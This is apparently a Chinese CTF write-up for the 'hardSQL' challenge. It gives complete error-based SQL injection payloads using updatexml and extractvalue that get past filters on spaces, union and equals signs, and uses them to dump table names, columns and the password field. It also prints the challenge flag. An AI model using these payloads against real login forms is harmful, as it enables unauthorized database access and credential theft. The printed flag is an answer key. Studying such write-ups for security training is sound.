[極客大挑戰 2019]hardSQL
開啟題目,發現這也還是一個SQL隱碼攻擊的題目。難度可能比之前的大,也就加了點過濾吧。
通過測試發現過濾了union,and,等於號,空格
可以使用updatexml或extractvalue報錯注入法
查表:
?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=admin
查列:
?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=admin
查內容:
?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))%23&password=admin
此時只得到了flag的左半部分,可以使用right()得到右半部分
?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(right(password,25)))from(H4rDsq1)),0x7e),1))%23&password=asdf
拼起來就可以得到flag了(記得去掉重複部分)
flag{21ef294f-3972-4f87-bd09-a5ea22ea3a34}
使用extractvalue報錯注入法:
查表:
username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e))))%23&password=admin
查列:
username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e))))%23&password=admin
查內容:
username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e))))%23&password=admin
username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(right(password,25)))from(H4rDsq1)),0x7e))))%23&password=admin
相關文章
- [極客大挑戰 2019]Http wpHTTP
- [極客大挑戰 2019]PHP 1PHP
- [極客大挑戰 2019]BuyFlag1
- buuctf-web-[極客大挑戰 2019]BuyFlag 1Web
- [極客大挑戰 2019]web部分題解(已完結!)Web
- 第五季極客大挑戰writeup
- CTF練習日記——[極客大挑戰 2019]Havefun 1
- buucitf-[極客大挑戰 2020]Roamphp1-WelcomePHP
- 阿里雲IoT將舉辦第三屆極客創新挑戰賽 吸引全球極客參賽阿里
- 牛客挑戰賽72 總結
- 匯聚極客頂尖高手和行業大咖,OPPO安全AI挑戰賽暨高峰論壇圓滿落幕行業AI
- 極客漫畫:程式語言之戰
- 集結,極客少年!vivo千鏡杯網路安全挑戰賽報名正式開啟!
- 牛客挑戰賽23-A.字串(尺取)字串
- 大規模資料處理實戰-蔡元楠-極客時間
- 極客學院&騰訊 TAPD·極客開放日 [敏捷開發暢想與實戰]敏捷
- 資料大屏視覺化挑戰視覺化
- 專案管理的十大挑戰專案管理
- go從入門到實戰-極客時間Go
- Vue開發實戰-唐金州-極客時間Vue
- 大資料帶給保險業的三大挑戰大資料
- Flutter 跨平臺框架應用實戰-2019極光開發者大會Flutter框架
- 黑客之王!韓國神童登頂黑客界的“極限挑戰”黑客
- 客戶端專案管理的挑戰及解決方法客戶端專案管理
- MySQL實戰45講-林曉斌-極客時間MySql
- 極客大學小馬哥的 Java 專案實戰營Java
- Serverless 崛起背後的五大挑戰Server
- 規模化執行敏捷:三大挑戰敏捷
- 《精靈寶可夢 GO》:機遇大於挑戰Go
- 大資料挑戰下的儲存之路大資料
- 挑戰大疆!小米全新產品大曝光:無人機無人機
- 黑客、極客和創客黑客
- 客戶關係管理挑戰:如何保持客戶滿意度並提高業績?
- Epic收購《糖豆人:終極挑戰賽》開發商Mediatonic
- 資料分析實戰45講-陳暘-極客時間
- React實戰進階45講-王沛-極客時間React
- 邱嶽的產品實戰-邱嶽-極客時間
- Kafka核心技術與實戰-胡夕-極客時間Kafka